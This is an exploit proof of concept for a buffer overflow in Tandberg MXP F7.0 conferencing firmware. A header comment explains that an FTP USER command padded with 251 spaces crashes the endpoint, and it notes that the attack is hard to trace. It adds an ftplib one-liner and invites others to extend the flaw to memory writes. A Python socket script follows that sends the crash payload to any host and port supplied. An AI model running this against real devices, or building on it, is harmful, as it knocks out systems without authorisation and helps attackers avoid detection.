######################################################################################### # # # TANDBERG BoF v0.1 - Tandberg MXP F7.0< # # Buffer Overflow Vulnerability PoC # # By otokoyama # # # # [+] We crash the process FtpCt00 by sending a 251 char string of /x20 commonly # # known as a blank space.(very simple) # # [+] The BOF happens due to the system passing all usernames:passwords to a log file. # # # # [+] Vendor has fixed THIS in the later releases of its firmware so it is now public. # # # # # # This is a good vuln due to the system not logging the IP address of the attacker. # # To be able to tell who was causing this you would need to grab a log from the FW # # and as TANDBERG does not provide timestamps on their endpoints pre f8.0 # # you would need to have recieved a SNMP notification to TMS that the system rebooted # # and cross reference that with the IP's connecting through the firewall. # # This is particularily annoying due to the fact that systems reboot all the time # # As endusers are constantly turning them on\off # # At this point the sysadmin goes "TANDBERG Can we buy an Expressway?" # # # # As far as it goes, creating a connectback shell would be difficult # # this is mainly due to the process on the Endpoint that detects a memory mismatch # # and subsequently reboots the system(security measure). # # # # To create a successfull exploit outside of the DoS # # you would need to locate the memory address of the process that reboots the system # # (there might even be a fallback on that) This is generally too cumbersome as # # this embeded system doesn't do anything fun anyway (why would you want access) # # # # In saying that, # # it would be fairly trivial to use the BoF to write something to the memory. # # you will notice buffer below only generates the exception 0x0200 aka Machine Check. # # Increasing the char sent to the unit will change that error to exception 0x1100 # # meaning we are sending the MINIMUM required length to overflow the buffer. # # I have done the hardwork for you! Please email me if you get some encodes. # # BTW, This could be done like this: # # from ftplib import FTP # # ftp = FTP('ip.addr') # # ftp.login(' '*251) # # ftp.quit()....but its dirty. # # # # shoutouts:mabus,gso # ######################################################################################### import socket import struct import time import sys buff='USER '+' '*251+'\r\n' if len(sys.argv)!=3: print "\n[+] Usage: %s "%sys.argv[0] print "[-] Example: python poc.py 192.168.1.23 23\n" sys.exit(0) try: print "[+] Connecting... %s" %sys.argv[1] s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((sys.argv[1],int(sys.argv[2]))) print "[+] Sending data..." time.sleep(1.2) s.send(buff) print "[+] Deed Done" s.recv(1024) except: print "[#] Unable to connect"